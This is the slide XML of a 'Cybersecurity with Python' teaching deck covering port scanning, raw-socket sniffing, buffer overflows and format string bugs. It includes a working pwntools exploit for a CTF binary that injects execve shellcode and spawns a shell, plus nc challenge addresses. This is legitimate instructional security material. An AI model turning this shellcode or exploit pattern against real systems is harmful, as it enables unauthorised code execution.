          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4228019" y="3479365"/>
            <a:ext cx="96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RSP &gt;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D647E4-5E63-4B91-BC6F-1F448102FF56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198707" y="1433478"/>
            <a:ext cx="96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RBP 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0410A9-D566-49C8-B7E8-1570EFC07E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694908" y="3791364"/>
            <a:ext cx="155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INPUT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F9183E-AEB0-4C6D-A052-7E3058163CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194673" y="4237864"/>
            <a:ext cx="312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AAAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4935680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852B4F7-4302-468E-8136-015D9DD9CC20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820638" y="1379438"/>
            <a:ext cx="26712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function1 (int a) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	char x[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	char y; 	</a:t>
            </a:r>
          </a:p>
          <a:p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(“%s”, x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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834A36-2CEF-4B3D-8E41-8950F9A39BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042239" y="1379284"/>
            <a:ext cx="3440485" cy="500605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9957BD-52A7-418A-AB8A-1405617D10DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222631" y="580292"/>
            <a:ext cx="293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2E9409-D7B7-491C-ACEB-328271BD32C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1652954" y="578677"/>
            <a:ext cx="155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B7DD20-880F-42E5-B7A0-AF264EC8614D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5042239" y="1379284"/>
            <a:ext cx="3440485" cy="46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A31E95-4729-47E2-B0D6-9F9E2C12C591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036382" y="1892172"/>
            <a:ext cx="3440485" cy="46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1594A7-63CB-46DC-B9D7-27A9DC52322A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5048096" y="2396268"/>
            <a:ext cx="3440485" cy="46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9800E9-6B33-412D-8E94-7238418B4591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5048096" y="2910984"/>
            <a:ext cx="3440485" cy="46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86308A-5A20-4A4B-A88D-647B4FCA990C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5045167" y="3422032"/>
            <a:ext cx="3440485" cy="46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A3A035-04CF-43BC-BBD4-D1BBCEE0999C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855678" y="1428168"/>
            <a:ext cx="204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value of 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6AF04D-51E0-4814-98B7-4BBDFB36E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8507591" y="2466446"/>
            <a:ext cx="2910254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 previous base pointer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4E3BB1-4D9D-40A9-A9C8-29088009F0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472424" y="1927187"/>
            <a:ext cx="2048608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 return address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B3B3D0-B3BB-457D-943C-17E052BFE06A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8284868" y="3022411"/>
            <a:ext cx="1888454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 value of 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11F18F-A5C3-4BEF-B91D-60C48F713D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5717931" y="3422032"/>
            <a:ext cx="218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value of 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EA1762-75E0-4A19-9DB6-E37EF377BF26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4228019" y="3479365"/>
            <a:ext cx="96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RSP &gt;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D647E4-5E63-4B91-BC6F-1F448102FF56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4198707" y="1433478"/>
            <a:ext cx="96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RBP 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0410A9-D566-49C8-B7E8-1570EFC07E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694908" y="3791364"/>
            <a:ext cx="155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INPUT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F9183E-AEB0-4C6D-A052-7E3058163CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820638" y="4448963"/>
            <a:ext cx="3122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AAAAAAAAAAAAAAAA AAAAAAAA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11854B-AB23-46B4-98EB-C6CE7CF4C28B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084033" y="2961581"/>
            <a:ext cx="156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AAAAAAAA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B41C09-5F3A-4D10-87D6-CB521E4844A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5717932" y="2445761"/>
            <a:ext cx="237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0x41414141414141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85459B-BB62-4BA1-A80B-8EC3F31E6A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5747242" y="1947528"/>
            <a:ext cx="237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0x41414141414141</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21713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11C25-0E82-43E7-9EAD-F40D96553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E38A0-A08C-4DE5-8F65-50DEE35D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015599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses raw sockets (we’re going to talk about what these are later) to discover open ports, gather OS information, and fuzz remote networks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17E279-563E-4920-BDF4-37C87A3EC93F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3532039" y="4100362"/>
            <a:ext cx="4263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Let’s open up NMAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17666200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65DC-1004-4EA8-A33D-EE2AA5154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String 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23F78-B3E1-4C09-A73F-C50A1EDDB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and similar functions have a hidden format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>writes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into memory the number of characters in the input to a pointer in the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“%s”, string) vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Formats in the string will execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%s and %x pop out and print the current items in stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows you to write arbitrary data into the stack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2535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B0CA-36A6-4526-B36B-9A906A40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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools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04EFD-2465-4973-ABCA-B0307ED3A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292" y="2777671"/>
            <a:ext cx="8825659" cy="2665186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTF framework to help you interact with binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pip install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from pwn import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://docs.pwntools.com/en/stable/index.html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398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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C1ED96-8589-4F9F-90FB-68797AA3108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593669" y="612844"/>
            <a:ext cx="8013732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pwntools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pwn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#Establish the target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target = process('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./pilot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’)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context.binary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ELF('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pilot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’)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#target = remote("pwn.chal.csaw.io", 8464)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#Attach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gdb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gdb.attach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(target,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gdbscript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= 'b *0x400ae0’)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#Print out the initial text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target.recvuntil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[*]Good Luck Pilot!....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#Scan in and filter out the info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leak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target.recvline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leak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target.recvline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 leak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leak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leak.replace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[*]Location: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", "")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leak = int(leak, 16)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#Print out the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infoleak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then prompt for input as a break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log.info("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The leak is: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 + hex(leak))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target.recvuntil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[*]Command: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", "")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#Establish the shellcode, the offsets, and the payload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shellcode =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\x31\xf6\x48\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xbf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\xd1\x9d\x96\x91\xd0\x8c\x97\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xff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\x48\xf7\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xdf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\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05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offset0 =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\x90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"*4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offset1 =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\x90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"*12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payload = offset0 + shellcode + offset1 + p64(leak)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#Send the payload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target.send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(payload)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#Drop to an interactive shell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target.interactive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4857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6FF63-F451-4CA8-8301-412A3D13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 to pwn some binaries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0EC3E75-8D00-406F-B181-A1A8B0A71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60399" y="1670105"/>
            <a:ext cx="3676647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Challenge 1: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cap="none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ctf.hackucf.org 9000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cap="none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cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Challenge 2: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cap="none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cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Baby’s first ELF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cap="none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cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Challenge 3: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cap="none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cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> ctf.hackucf.org 32101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cap="none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cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Challenge 4: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cap="none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cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Conditional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cap="none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cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Challenge 5: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cap="none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cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> ctf.hackucf.org 7003</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30770666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5B08-EFF1-4C9E-9788-88E2AC818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417" y="2146423"/>
            <a:ext cx="4351025" cy="2283824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thanks for attending!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FF260-DE31-4457-9726-84BFE9C97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7249" y="2146423"/>
            <a:ext cx="3757545" cy="228382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3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3CB5-FBA0-4F81-A90B-AB8DB1D9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49C5D-9B62-4853-BA68-2D049B98A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59120"/>
            <a:ext cx="8825659" cy="4182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are they?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal sockets depend on the kernel to autogenerate headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Raw Sockets that allow you to see all of the unprocessed data in a packet </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows you to send fully modified packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why do we need them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to craft headers which means….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can break services that haven’t protected against unexpected input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can masquerade as others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They run on promiscuous mode which means….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can capture packets on the same network that weren’t meant for you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245590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3216-1689-4C87-945F-254F2EF2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645C2C-650D-4026-9732-1574CAF90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890" y="2603866"/>
            <a:ext cx="6955114" cy="3750794"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1893318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7881-6D60-4B82-B3DE-E2CDB7CD6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7F707-D5AB-4B0B-BFF1-9B5453F32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601" y="3318176"/>
            <a:ext cx="8046797" cy="7069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Let’s capture some packets with raw sockets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974361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74420-EAF3-4C76-82D0-55C627CAFF8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64143" y="688056"/>
            <a:ext cx="9529011" cy="6001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import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># library that handles raw sockets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host = “192.168.x.xxx“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># host to listen on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socket_protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.IPPROTO_ICMP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# create a raw socket and bind it to the public interface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sniffer = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.AF_INET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.SOCK_RAW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket_protocol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i="1" dirty="0"/>
              <a:t># creates a new socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># First param: address family, IPv4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># Second param: type of socket, SOCK_STREAM by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># Third param: protocol we’re using</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4031398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5CA876-FA15-4999-A796-C561D46A0BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683394" y="875899"/>
            <a:ext cx="9471259" cy="461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sniffer.bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>((host,0))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># Associates the socket object with our host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sniffer.setsockopt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.IPPROTO_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.IP_HDRINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># we want the IP headers included in the capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># First param: The level on the OSI model to interpret at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># Second param: option name that stops kernel from generating the headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># Third param: Boolean value, 1 enables, 0 disables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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sniffer.recvfrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(65565)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t># Print out the packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31228413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8865</TotalTime>
  <Words>1821</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>374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Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Ion Boardroom</vt:lpstr>
      <vt:lpstr>Cybersecurity with Python</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Port scanning</vt:lpstr>
      <vt:lpstr>Nmap</vt:lpstr>
      <vt:lpstr>Raw Sockets</vt:lpstr>
      <vt:lpstr>Headers</vt:lpstr>
      <vt:lpstr>Exercise 1</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>IP Spoofing</vt:lpstr>
      <vt:lpstr>ARP Poisoning</vt:lpstr>
      <vt:lpstr>SYN Flooding</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Packet sniffing</vt:lpstr>
      <vt:lpstr>Let’s sniff some packets</vt:lpstr>
      <vt:lpstr>Let’s sniff some packets</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Try it out</vt:lpstr>
      <vt:lpstr>Python Requests</vt:lpstr>
      <vt:lpstr>Reverse Engineering</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Registers</vt:lpstr>
      <vt:lpstr>The Stack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Heap</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Opcodes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Let’s look at some tools!</vt:lpstr>
      <vt:lpstr>Let’s look at some tools!</vt:lpstr>
      <vt:lpstr>Let’s look at some tools!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Let’s look at some tools!</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Binary Exploitation</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Format String Vulnerability</vt:lpstr>
      <vt:lpstr> Using pwntools</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Time to pwn some binaries</vt:lpstr>
      <vt:lpstr>Thanks for attending!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with Python</dc:title>
  <dc:creator>Serra Abak</dc:creator>
  <cp:lastModifiedBy>Serra Abak</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-12T02:28:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-18T06:13:47Z</dcterms:modified>
</cp:coreProperties>
</file>